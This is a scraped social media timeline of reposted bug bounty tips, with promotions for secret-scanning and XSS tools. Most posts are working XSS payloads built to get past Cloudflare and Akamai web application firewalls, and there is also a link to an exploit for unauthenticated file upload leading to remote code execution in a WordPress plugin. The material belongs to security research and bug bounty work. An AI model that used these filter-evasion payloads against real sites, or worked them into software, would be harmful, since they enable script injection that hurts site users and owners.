BugHunta's profile picture.

myskar

@BugHunta

myskar 已转帖

I'm giving away the secrets to our 20K$ bounty. Link :- speakerdeck.com/dk999/to-the-d… Cost - 0$


myskar 已转帖

🔍 Hunting secrets just got easier. Meet KeySec Hunter — a Chrome extension that scans websites for keywords & exposed secrets. 💡 Perfect for bug bounty hunters & devs. github.com/dirtycoder0124… #BugBounty #bugbountytips

dirtycoder0124's tweet image. 🔍 Hunting secrets just got easier.

Meet KeySec Hunter — a Chrome extension that scans websites for keywords & exposed secrets.

💡 Perfect for bug bounty hunters & devs.

github.com/dirtycoder0124…

#BugBounty #bugbountytips

myskar 已转帖

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript​:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #BugBounty #XSS

NullSecurityX's tweet image. Cloudflare WAF Bypass → XSS 💡

The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS:

--&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript​:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20//

#CyberSecurity #BugBounty #XSS

myskar 已转帖

Old Cloudflare XSS bypass but still works . . <img alt="<x" title="/><img src=x onerror=alert(6)>">

19whoami19's tweet image. Old Cloudflare XSS bypass but still works
.
.
&amp;lt;img alt=&quot;&amp;lt;x&quot; title=&quot;/&amp;gt;&amp;lt;img src=x onerror=alert(6)&amp;gt;&quot;&amp;gt;

myskar 已转帖

When testing DOM XSS in redirection sinks, don't use javascript:alert(1) use javascript://target.com/%E2%80%A8alert(1) instead. Many targets don't validate the URL scheme, but they do validate the host. #bugbounty #bugbountytips #xss #bypass


myskar 已转帖

🏆 KNOXSS August 2025 Giveaway 🏆 ➡️ Follow, like and share! 😍 ➡️ 1 Month Pro access for 3 winners on Friday 8th Good luck! 🤞 knoxss.pro - #XSS made easy. Sign up or upgrade now. #WebAppSec #BugBounty #PenTesting


myskar 已转帖

CVE-2024-5084 Wordpress Hash Form – Drag & Drop Form Builder <= 1.1.0 - Unauthenticated Arbitrary File Upload to Remote Code Execution #WordPressPlugin #security #exploit #php #cve github.com/KTN1990/CVE-20…


myskar 已转帖

beeeeeeeest tooooolll!

🚀 JS Explorer is live now! Discover JS URLs from domains for free. Powered with 500M JS URLs and updating every week. Visit jsmon.sh/jsexplorer/ now. ✅ Retweet, bookmark and share link with your friends in bugbounty, cybersecurity and OSINT research.



myskar 已转帖

Example using ; Thanks for the payload list, man 🌹🌹 @nav1n0x github.com/ifconfig-me

ynsmroztas's tweet image. Example using ; 

Thanks for the payload list, man 🌹🌹 @nav1n0x github.com/ifconfig-me

myskar 已转帖

*** KNOXSS GIVEAWAY June 2025 *** Directions: 1. Like 2. Share 3. Be a follower Prize: KNOXSS Pro for 1 Month Results: June 10th Number of Winners: 3 Good luck! 😀 knoxss.pro - #XSS for pros. #BugBounty #PenTesting


myskar 已转帖

Blind SQL injection in JSON 💉 #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. Blind SQL injection in JSON 💉

#infosec #cybersec #bugbountytips

myskar 已转帖

been using this techniques to bypass many WAFs, open the console in the vulnrable page, run this code to extract variables refering to window object: for(let x in window)if(window[x]===window)console.log(x); then leaverage it to execute JS functions, happy hunting :]

YShahinzadeh's tweet image. been using this techniques to bypass many WAFs, open the console in the vulnrable page, run this code to extract variables refering to window object:

for(let x in window)if(window[x]===window)console.log(x);

then leaverage it to execute JS functions, happy hunting :]

myskar 已转帖

If the WAF doesn't allow the creation of a JavaScript term like 'alert' or 'confirm' in any way, write it inverted and then use reverse() with self[]. Payload: <a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)> #Bugbounty #AkamaiBypass

erickfernandox's tweet image. If the WAF doesn&apos;t allow the creation of a JavaScript term like &apos;alert&apos; or &apos;confirm&apos; in any way, write it inverted and then use reverse() with self[].

Payload:

&amp;lt;a%20href=%0dj&amp;amp;Tab;avascript&amp;amp;colon;x=&apos;trela&apos;.split(&apos;&apos;).reverse().join(&apos;&apos;);self[x](origin)&amp;gt;

#Bugbounty #AkamaiBypass

myskar 已转帖

Cloudflare bypassed !⚙️ "-alert(0)-" >>blocked "-top['al\x65rt']('XD')-" >>passed #infosec #bugbountytips #CyberSecurity


myskar 已转帖

This might trick some #XSS filters out there, including CloudFlare's. <Svg OnLoad="alert//>%0A(1)"


myskar 已转帖

CSPBypass is a simple CSP bypass search to help you find any documented JSONP endpoints to achieve XSS! 😎 🔗 cspbypass.com

intigriti's tweet image. CSPBypass is a simple CSP bypass search to help you find any documented JSONP endpoints to achieve XSS! 😎 

🔗 cspbypass.com

myskar 已转帖

#XSS validation filter #bypass.

KN0X55's tweet image. #XSS validation filter #bypass.

myskar 已转帖

CloudFlare XSS Bypass : "><P/onpointerenter=alert(1)>

GBN_511's tweet image. CloudFlare XSS Bypass :

&quot;&amp;gt;&amp;lt;P/onpointerenter=alert(1)&amp;gt;

myskar 已转帖

using waymore and other spidering tools and if it hasn't an option to restrict to scope like "katana -d 5 -fs fqdn" , so greping your scope file, and grep "=" |grep -v "js?" | qsreplace -a | uro | urless , and if it's too many , so httpx -mc 200 >> urls


myskar 已转帖

v1.4 of xnldorker is available: 🩹 BUG FIX: Was unable to get links from Bing after they made a change to the page. Links can no be retrieved again github.com/xnl-h4ck3r/xnl… #bugbounty 🤘


Loading...

Something went wrong.


Something went wrong.